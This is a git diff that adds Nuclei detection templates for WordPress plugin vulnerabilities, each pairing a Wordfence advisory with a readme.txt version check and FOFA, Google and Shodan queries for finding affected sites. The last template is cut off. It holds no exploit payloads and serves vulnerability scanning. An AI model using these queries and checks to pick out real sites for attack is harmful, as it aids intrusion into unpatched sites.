Marketing Automation by AZEXO <= 1.27.80 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + The Marketing Automation by AZEXO plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.27.80. This is due to the plugin not properly retricting functionality that allows a user to elevate their privileges. This makes it possible for authenticated attackers, with Subscriber-level access and above, to gain administrator access to a site. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9a9675f-76f5-4551-8d2d-60ae7a8378d1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-50506 + metadata: + fofa-query: "wp-content/plugins/marketing-automation-by-azexo/" + google-query: inurl:"/wp-content/plugins/marketing-automation-by-azexo/" + shodan-query: 'vuln:CVE-2024-50506' + tags: cve,wordpress,wp-plugin,marketing-automation-by-azexo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/marketing-automation-by-azexo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "marketing-automation-by-azexo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.27.80') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50507.yaml b/poc/cve/CVE-2024-50507.yaml new file mode 100644 index 0000000000..62974bf3d4 --- /dev/null +++ b/poc/cve/CVE-2024-50507.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50507-51ddef91051431f4533a4f6a3fe8afd5 + +info: + name: > + DS.DownloadList <= 1.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The DS.DownloadList plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/600aef49-b918-4d58-a460-f9cdbeaa17dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-50507 + metadata: + fofa-query: "wp-content/plugins/dsdownloadlist/" + google-query: inurl:"/wp-content/plugins/dsdownloadlist/" + shodan-query: 'vuln:CVE-2024-50507' + tags: cve,wordpress,wp-plugin,dsdownloadlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dsdownloadlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dsdownloadlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50508.yaml b/poc/cve/CVE-2024-50508.yaml new file mode 100644 index 0000000000..d92eed92bc --- /dev/null +++ b/poc/cve/CVE-2024-50508.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50508-ce09f3e88a290df0e82d6f222274970f + +info: + name: > + Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Download + author: topscoder + severity: high + description: > + The Woocommerce Product Design plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/37e84cab-746a-4b64-b9a1-7232584d1f19?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-50508 + metadata: + fofa-query: "wp-content/plugins/woo-product-design/" + google-query: inurl:"/wp-content/plugins/woo-product-design/" + shodan-query: 'vuln:CVE-2024-50508' + tags: cve,wordpress,wp-plugin,woo-product-design,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-product-design/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-product-design" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50509.yaml b/poc/cve/CVE-2024-50509.yaml new file mode 100644 index 0000000000..8e9fa13c20 --- /dev/null +++ b/poc/cve/CVE-2024-50509.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50509-629fe701bf3b8fa380113ae2d245568b + +info: + name: > + Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: critical + description: > + The Woocommerce Product Design plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e987c38-b3a0-470e-9688-c8d79c853501?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-50509 + metadata: + fofa-query: "wp-content/plugins/woo-product-design/" + google-query: inurl:"/wp-content/plugins/woo-product-design/" + shodan-query: 'vuln:CVE-2024-50509' + tags: cve,wordpress,wp-plugin,woo-product-design,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-product-design/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-product-design" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50510.yaml b/poc/cve/CVE-2024-50510.yaml new file mode 100644 index 0000000000..56ee1bf348 --- /dev/null +++ b/poc/cve/CVE-2024-50510.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50510-0f258545969915717983830459c9be02 + +info: + name: > + AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + The AR for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 6.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48950965-f7da-42af-9f9a-4bf7fd33be45?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-50510 + metadata: + fofa-query: "wp-content/plugins/ar-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/ar-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-50510' + tags: cve,wordpress,wp-plugin,ar-for-woocommerce,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ar-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ar-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50511.yaml b/poc/cve/CVE-2024-50511.yaml new file mode 100644 index 0000000000..70a8428fa3 --- /dev/null +++ b/poc/cve/CVE-2024-50511.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50511-29b214c219866f7f2500c02f16eae355 + +info: + name: > + WP donimedia carousel <= 1.0.1 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The WP donimedia carousel plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff09292b-c8a6-4cd8-a8dd-d79b4c713d6f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-50511 + metadata: + fofa-query: "wp-content/plugins/wp-donimedia-carousel/" + google-query: inurl:"/wp-content/plugins/wp-donimedia-carousel/" + shodan-query: 'vuln:CVE-2024-50511' + tags: cve,wordpress,wp-plugin,wp-donimedia-carousel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-donimedia-carousel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-donimedia-carousel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50512.yaml b/poc/cve/CVE-2024-50512.yaml new file mode 100644 index 0000000000..5b2fcde724 --- /dev/null +++ b/poc/cve/CVE-2024-50512.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50512-237b303d56b5af70349547129fcdbed3 + +info: + name: > + Posti Shipping <= 3.10.2 - Full Path Disclosure + author: topscoder + severity: medium + description: > + The Posti Shipping plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.10.2. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/023bef79-a3ab-41f7-a287-955c6331c77e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-50512 + metadata: + fofa-query: "wp-content/plugins/posti-shipping/" + google-query: inurl:"/wp-content/plugins/posti-shipping/" + shodan-query: 'vuln:CVE-2024-50512' + tags: cve,wordpress,wp-plugin,posti-shipping,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/posti-shipping/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "posti-shipping" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.10.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50513.yaml b/poc/cve/CVE-2024-50513.yaml new file mode 100644 index 0000000000..f0b5865fcd --- /dev/null +++ b/poc/cve/CVE-2024-50513.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50513-9a78c086e5a8808800a944063382e7fe + +info: + name: > + PostX <= 4.1.15 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97df0ac7-3240-4d2b-aa2c-779c8e9359e8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-50513 + metadata: + fofa-query: "wp-content/plugins/ultimate-post/" + google-query: inurl:"/wp-content/plugins/ultimate-post/" + shodan-query: 'vuln:CVE-2024-50513' + tags: cve,wordpress,wp-plugin,ultimate-post,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.15') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50514.yaml b/poc/cve/CVE-2024-50514.yaml new file mode 100644 index 0000000000..95d27ab35a --- /dev/null +++ b/poc/cve/CVE-2024-50514.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50514-accc68ef1929a7b2329c8ddb3987dcea + +info: + name: > + Ninja Forms – The Contact Form Builder That Grows With You <= 3.8.17 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.8.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/949ea4e6-420a-437d-8e71-ee20119343f3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-50514 + metadata: + fofa-query: "wp-content/plugins/ninja-forms/" + google-query: inurl:"/wp-content/plugins/ninja-forms/" + shodan-query: 'vuln:CVE-2024-50514' + tags: cve,wordpress,wp-plugin,ninja-forms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.17') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50515.yaml b/poc/cve/CVE-2024-50515.yaml new file mode 100644 index 0000000000..23473b7bbf --- /dev/null +++ b/poc/cve/CVE-2024-50515.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50515-926c437f547ae6645dfe09ee30b6a14a + +info: + name: > + Ninja Forms – The Contact Form Builder That Grows With You <= 3.8.17 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.8.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00dc3911-c29e-4f4f-973c-8e4da5dd0e35?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-50515 + metadata: + fofa-query: "wp-content/plugins/ninja-forms/" + google-query: inurl:"/wp-content/plugins/ninja-forms/" + shodan-query: 'vuln:CVE-2024-50515' + tags: cve,wordpress,wp-plugin,ninja-forms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.17') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50516.yaml b/poc/cve/CVE-2024-50516.yaml new file mode 100644 index 0000000000..f0179b377b --- /dev/null +++ b/poc/cve/CVE-2024-50516.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50516-8a347587322ab61994f1c313f3ae4f6a + +info: + name: > + Countdown, Coming Soon, Maintenance – Countdown & Clock <= 2.8.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Countdown, Coming Soon, Maintenance – Countdown & Clock plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99a24c92-b6e5-4bbd-8cd8-1f95f47d3675?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-50516 + metadata: + fofa-query: "wp-content/plugins/countdown-builder/" + google-query: inurl:"/wp-content/plugins/countdown-builder/" + shodan-query: 'vuln:CVE-2024-50516' + tags: cve,wordpress,wp-plugin,countdown-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/countdown-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "countdown-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50550.yaml b/poc/cve/CVE-2024-50550.yaml new file mode 100644 index 0000000000..949bbcdd99 --- /dev/null +++ b/poc/cve/CVE-2024-50550.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50550-9294cd7dd32b1b6c4c7413876be90f29 + +info: + name: > + LiteSpeed Cache <= 6.5.1 - Unauthenticated Privilege Escalation + author: topscoder + severity: high + description: > + The LiteSpeed Cache plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.5.1. This is due to the is_role_simulation() function not properly providing protection against unauthorized use of the function. This makes it possible for unauthenticated attackers to simulate roles such as administrators which provides elevated access to the site. Please note there are a lot of pre-requisites for this to be exploitable. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91365d3b-8e93-4202-8d44-9d217aaae0a4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-50550 + metadata: + fofa-query: "wp-content/plugins/litespeed-cache/" + google-query: inurl:"/wp-content/plugins/litespeed-cache/" + shodan-query: 'vuln:CVE-2024-50550' + tags: cve,wordpress,wp-plugin,litespeed-cache,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "litespeed-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51615.yaml b/poc/cve/CVE-2024-51615.yaml new file mode 100644 index 0000000000..e8847045ca --- /dev/null +++ b/poc/cve/CVE-2024-51615.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51615-472c74f38292481e3ef2df3b338ae9c4 + +info: + name: > + WordPress Auction Plugin <= 3.7 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The WordPress Auction Plugin plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c2e8932-f207-40f2-85c9-5d1f28f859f2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-51615 + metadata: + fofa-query: "wp-content/plugins/wp-auctions/" + google-query: inurl:"/wp-content/plugins/wp-auctions/" + shodan-query: 'vuln:CVE-2024-51615' + tags: cve,wordpress,wp-plugin,wp-auctions,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-auctions/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-auctions" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51647.yaml b/poc/cve/CVE-2024-51647.yaml new file mode 100644 index 0000000000..852818c0cb --- /dev/null +++ b/poc/cve/CVE-2024-51647.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51647-ad264e127abeca56e70808ef8908f3d5 + +info: + name: > + Featured Posts Scroll <= 1.25 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Featured Posts Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.25. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4196b8d1-23a7-4b90-8e6b-f51849d44f9c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-51647 + metadata: + fofa-query: "wp-content/plugins/featured-posts-scroll/" + google-query: inurl:"/wp-content/plugins/featured-posts-scroll/" + shodan-query: 'vuln:CVE-2024-51647' + tags: cve,wordpress,wp-plugin,featured-posts-scroll,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-scroll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-scroll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.25') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51792.yaml b/poc/cve/CVE-2024-51792.yaml new file mode 100644 index 0000000000..1ef4002b76 --- /dev/null +++ b/poc/cve/CVE-2024-51792.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51792-bdfb574c36a41e7d922169660919a6d7 + +info: + name: > + Audio Record <= 1.0 - Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Audio Record plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the save_record_callback function in versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5a7f869d-e915-4048-b0e1-36cf25e732f9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-51792 + metadata: + fofa-query: "wp-content/plugins/audio-record/" + google-query: inurl:"/wp-content/plugins/audio-record/" + shodan-query: 'vuln:CVE-2024-51792' + tags: cve,wordpress,wp-plugin,audio-record,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/audio-record/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "audio-record" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51815.yaml b/poc/cve/CVE-2024-51815.yaml new file mode 100644 index 0000000000..9d365f9368 --- /dev/null +++ b/poc/cve/CVE-2024-51815.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51815-2050eb9a873e413f9671599898c2d828 + +info: + name: > + s2Member (Pro) <= 241114 - Unauthenticated Remote Code Execution + author: topscoder + severity: critical + description: > + The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions (Pro) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 241114. This makes it possible for unauthenticated attackers to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc6de82-a4c1-4125-9be0-4fb6de42c178?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-51815 + metadata: + fofa-query: "wp-content/plugins/s2member/" + google-query: inurl:"/wp-content/plugins/s2member/" + shodan-query: 'vuln:CVE-2024-51815' + tags: cve,wordpress,wp-plugin,s2member,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/s2member/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "s2member" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 241114') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53278.yaml b/poc/cve/CVE-2024-53278.yaml new file mode 100644 index 0000000000..7e2cab2c84 --- /dev/null +++ b/poc/cve/CVE-2024-53278.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53278-e787634bec31d7c19793015e1c4a9a1d + +info: + name: > + WP Admin UI Customize <= 1.5.13 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Admin UI Customize plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4e8f03f4-f7a6-408c-a79e-f9cd03d77a76?source=api-prod + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-53278 + metadata: + fofa-query: "wp-content/plugins/wp-admin-ui-customize/" + google-query: inurl:"/wp-content/plugins/wp-admin-ui-customize/" + shodan-query: 'vuln:CVE-2024-53278' + tags: cve,wordpress,wp-plugin,wp-admin-ui-customize,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - 